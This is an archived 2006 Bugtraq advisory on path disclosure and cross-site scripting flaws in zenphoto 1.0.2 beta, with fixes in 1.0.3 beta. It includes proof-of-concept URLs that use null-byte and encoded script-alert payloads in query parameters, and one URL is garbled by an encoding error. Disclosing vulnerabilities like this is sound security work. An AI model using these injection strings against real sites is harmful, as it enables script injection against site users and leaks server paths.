lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061011223242.31569.qmail@securityfocus.com> Date: 11 Oct 2006 22:32:42 -0000 From: raphael.huck@...e.fr To: bugtraq@...urityfocus.com Subject: zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities Vendor: zenphoto Vulnerable: zenphoto 1.0.2 beta and below The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta. Path Disclosure --------------- http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAGE_NAME&s=thumb%00 which returns: Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85... Cross Site Scripting -------------------- http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAMEℑ=EXISTING_IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3Eaaaa Solution -------- Update to 1.0.3 beta Original advisory ----------------- http://zone14.free.fr/advisories/4/ --Raphael HUCK